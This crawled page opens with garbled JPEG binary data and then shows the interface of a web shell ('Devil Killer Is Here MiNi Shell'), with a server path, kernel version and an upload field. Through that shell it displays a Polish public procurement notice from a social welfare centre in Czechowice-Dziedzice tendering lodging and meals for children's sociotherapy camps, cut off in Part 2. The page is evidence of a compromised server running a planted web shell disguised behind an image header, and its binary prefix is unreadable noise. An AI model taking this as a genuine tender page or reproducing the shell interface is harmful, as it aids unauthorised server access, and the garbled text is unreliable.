JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250107/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250107/0000835401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług zakwaterowania i wyżywienia podczas 3. wyjazdowych kolonii socjoterapeutycznych dla dzieci i młodzieży mieszkających na terenie gminy Czechowice-Dziedzice. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ośrodek Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003449120</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolejowa 37</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czechowice-Dziedzice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-502</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 215 50 98</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">32 215 23 81-83</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@ops-czdz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ops-czdz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług zakwaterowania i wyżywienia podczas 3. wyjazdowych kolonii socjoterapeutycznych dla dzieci i młodzieży mieszkających na terenie gminy Czechowice-Dziedzice. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-57bebca9-1bb6-45ca-b6ac-a9f39e7cbea4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00008354</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-01-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt pn. „NIE-zwykłe Dziecko. Edycja II”, współfinansowany w ramach Fundusze Europejskie dla Śląskiego 2021-2027 Europejski Fundusz Społeczny+, Priorytet: FESL.07.00-Fundusze Europejskie dla społeczeństwa, Działanie: FESL.07.07-Wsparcie rodziny, dzieci i młodzieży oraz deinstytucjonalizacja pieczy zastępczej </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-57bebca9-1bb6-45ca-b6ac-a9f39e7cbea4 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl/<br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”. <br/>2. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania. <br/>3. Sposób sporządzania dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych. <br/>4. Dokumenty elektroniczne, o których mowa w par. 2 ust. 1 Rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>5. Informacje, oświadczenia lub dokumenty, inne niż wymienione w par. 2 ust. 1 Rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej: <br/>5.1. w formatach danych określonych w przepisach Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuj się jako załącznik), lub<br/>5.2. jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”.<br/>6. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „Dodaj załącznik”).<br/>7. W przypadku załączników, które są zgodne z ustawą Pzp lub Rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, mogą być opatrzone, zgodnie z wyborem Wykonawcy/Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/Podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>8. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>9. Wszystkie wysyłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. <br/>10. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). <br/><br/>Uwaga - Szczegółowe wymagania techniczne i organizacyjne dot. korespondencji elektronicznej zostały określone w SWZ obowiązującej w postępowaniu OPS.DKA.260.1.2025.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str.1), dalej „RODO”, Zamawiający informuje, że: <br/>1.1. jest administratorem danych osobowych Wykonawcy oraz osób, które Wykonawca przekazał w przedmiotowym postępowaniu;<br/>1.2 dane osobowe przetwarzane będą w celu przeprowadzenia postępowania <br/>o udzielenie zamówienia publicznego na podstawie art. 6 ust.1 lit. c RODO, zgodnie z ustawą Pzp oraz w celu zawarcia umowy na podstawie art. 6 ust. 1 lit. b RODO.<br/>1.3. odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz 74 ust. 1 ustawy Pzp oraz Zamawiający, który prowadzi postępowanie oraz obsługę finansowo-księgową. <br/>1.4. dane osobowe będą przechowywane przez okres, który wyznaczony zostanie przede wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie działania archiwów zakładowych, chyba że przepisy szczególne stanowią inaczej. <br/>1.5. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp. <br/>1.6. w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany i dane nie będą profilowane.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.7. Wykonawca posiada: <br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników); <br/>- na podstawie art. 18 RODO prawo żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO. <br/>1.8. Wykonawcy nie przysługuje: <br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>- na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OPS.DKA.260.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia w ramach części nr 1 zamówienia OPS.DKA.260.1.2025 jest świadczenie usług zakwaterowania i wyżywienia podczas wyjazdowej kolonii socjoterapeutycznej dla dzieci i młodzieży <br/>w wieku 6-15 lat mieszkających na terenie gminy Czechowice-Dziedzice, realizowanej w ramach projektu „NIE-zwykłe Dziecko. Edycja II”, współfinansowanego ze środków w ramach Fundusze Europejskie dla Śląskie 2021-2027 (EFS+).<br/><br/>Wykonawca zobowiązany będzie do zrealizowania przedmiotu zamówienia, który obejmował będzie w szczególności: <br/>a)	zakwaterowanie dla 51 osób: 44 dzieci i młodzieży, 6 opiekunów i 1 kierowcy w obiekcie zapewniającym bezpieczne i higieniczne warunki wypoczynku uczestników (10 nocy); <br/>b)	wyżywienie dla 51 osób: 44 dzieci i młodzieży, 6 opiekunów i 1 kierowcy - zgodnie z zasadami higieny żywienia, w tym z przepisami ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (tekst jedn. Dz.U. z 2023 r. poz. 1448); <br/>c)	ośrodek wypoczynkowy, w którym zakwaterowane zostaną ww. osoby, musi być położony na terenie województwa pomorskiego lub zachodniopomorskiego <br/>- w bliskiej odległości od morza (max. odległość ośrodka od nadmorskiej plaży <br/>– 800 metrów pieszo). <br/><br/>Termin realizacji części nr 1 zamówienia: <br/>21.07.2025 r. – 31.07.2025 r. – z możliwością przesunięcia realizacji zamówienia do 3 dni do przodu, tj. najpóźniej 24.07.2025 r. – 03.08.2025 r. <br/><br/>Uwagi: <br/>1) Szczegółowy Opis Przedmiotu Zamówienia stanowi załącznik nr 6 do SWZ.<br/>2) Wszystkie wymagania określone w załączniku nr 6 do SWZ („Szczegółowy Opis Przedmiotu Zamówienia”) stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty, jako niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55240000-4 - Usługi w zakresie ośrodków i domów wypoczynkowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55270000-3 - Usługi świadczone przez placówki oferujące wyżywienie i miejsca noclegowe</p> <p class="mb-0">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-07-21 do 2025-07-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty najkorzystniejszej zostanie dokonany według następujących kryteriów oceny ofert: <br/>- cena brutto oferty = 50% <br/>- ocena standardu obiektu = 50%.<br/>1.1. Cena oferty. <br/>Ocena porównawcza. Waga kryterium ceny = 50%<br/>Punkty w tym kryterium zostaną przyznane w zależności od zaoferowanej przez Wykonawcę ceny brutto za wykonanie przedmiotu zamówienia. Liczba punktów w kryterium „cena oferty” obliczona zostanie jako iloraz najniższej zaoferowanej ceny spośród wszystkich ofert nie podlegających odrzuceniu oraz ceny zaoferowanej w ofercie ocenianej, pomnożony przez 50 punktów.<br/>1.2. Ocena standardu obiektu.<br/>Ocena porównawcza. Waga kryterium = 50%<br/>Ocenie podlegać będą szczegółowe informacje dotyczące jednego obiektu, złożone przez Wykonawcę w formularzu ofertowym, zgodnie z opisem przedmiotu zamówienia zawartym w Załączniku nr 6 do SWZ.<br/>1.2.1. Podkryterium – Zakwaterowanie uczestników kolonii w:<br/>- pokojach dwuosobowych z pełnym węzłem sanitarnym = 15 pkt<br/>- pokojach trzyosobowych z pełnym węzłem sanitarnym = 10 pkt<br/>- pokojach czteroosobowych z pełnym węzłem sanitarnym = 5 pkt.<br/>- pokojach pięcioosobowych z pełnym węzłem sanitarnym = 0 pkt.<br/>1.2.2. Podkryterium – Odległość od obiektu kolonijnego do otwartego, strzeżonego kąpieliska nadmorskiego. <br/>Punkty w kryterium będą przyznawane na podstawie wskazanego przez Wykonawcę w formularzu ofertowym (załącznik nr 1 do SWZ) otwartego, strzeżonego kąpieliska nadmorskiego, położonego najbliżej ośrodka, gdzie uczestnicy kolonii będą zakwaterowani (odległość rozumiana jako długość trasy do przejścia, a nie w linii prostej) – wg następujących zasad: <br/>- otwarte, strzeżone kąpielisko nadmorskie w odległości mniejszej niż 250 m od ośrodka kolonijnego = 15 pkt<br/>- od 250 m do 499 m = 10 pkt<br/>- od 500 m do 799 m = 5 pkt<br/>- 800 m = 0 pkt<br/>1.2.3. Podkryterium – Zaplecze rekreacyjne wewnątrz budynku, w którym uczestnicy kolonii będą zakwaterowani.<br/>Punkty w kryterium będą przyznawane na podstawie wskazanego przez Wykonawcę w formularzu ofertowym (załącznik nr 1 do SWZ) zaplecza rekreacyjnego zlokalizowanego wewnątrz budynku, w którym uczestnicy kolonii będą zakwaterowani – wg następujących zasad: <br/>- 3 (trzy) sale (świetlice), wyposażone w sprzęt i urządzenia do gier i zabaw (np. piłkarzyki, stół bilardowy, stół do tenisa stołowego, gry planszowe) – w tym jedna sala (świetlica) przystosowana do organizacji dyskoteki (wyposażona w niezbędny sprzęt grający i nagłośnienie) = 10 pkt <br/>- 2 (dwie) sale (świetlice), wyposażone w sprzęt i urządzenia do gier i zabaw (np. piłkarzyki, stół bilardowy, stół do tenisa stołowego, gry planszowe) – w tym jedna sala (świetlica) przystosowana do organizacji dyskoteki (wyposażona w niezbędny sprzęt grający i nagłośnienie) = 5 pkt <br/>- 1 (jedna) sala (świetlica), wyposażona w sprzęt i urządzenia do gier i zabaw (np. piłkarzyki, stół bilardowy, stół do tenisa stołowego, gry planszowe) oraz przystosowana do organizacji dyskoteki (wyposażona w niezbędny sprzęt grający i nagłośnienie) = 0 pkt. <br/>1.2.4. Podkryterium – Zaplecze sportowo-rekreacyjne na zewnątrz budynku, w którym uczestnicy kolonii będą zakwaterowani.<br/>Punkty w kryterium będą przyznawane na podstawie wskazanego przez Wykonawcę w formularzu ofertowym (załącznik nr 1 do SWZ) zaplecza sportowo-rekreacyjnego zlokalizowanego na zewnątrz budynku (a jednocześnie w obrębie, na terenie, ośrodka wypoczynkowego, w którym uczestnicy kolonii będą zakwaterowani) – wg następujących zasad: <br/>- obiekt wyposażony w boisko wielofunkcyjne o sztucznej nawierzchni, siłownię zewnętrzną, plac zabaw i namiot letni = 10 pkt <br/>- obiekt wyposażony w boisko wielofunkcyjne oraz jeden z ww. elementów infrastruktury (siłownię zewnętrzną lub plac zabaw lub namiot letni) = 5 pkt <br/>- obiekt wyposażony w jeden z ww. elementów infrastruktury sportowo-rekreacyjnej (boisko wielofunkcyjne o sztucznej nawierzchni lub siłownię zewnętrzną lub plac zabaw lub namiot letni) = 0 pkt. <br/>UWAGA: Szczegółowo sposób oceny ofert został określony w rozdziale 18. SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ocena standardu obiektu ośrodka wypoczynkowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia w ramach części nr 2 zamówienia OPS.DKA.260.1.2025 jest świadczenie usług zakwaterowania i wyżywienia podczas wyjazdowej kolonii socjoterapeutycznej dla dzieci i młodzieży <br/>w wieku 6-15 lat mieszkających na terenie gminy 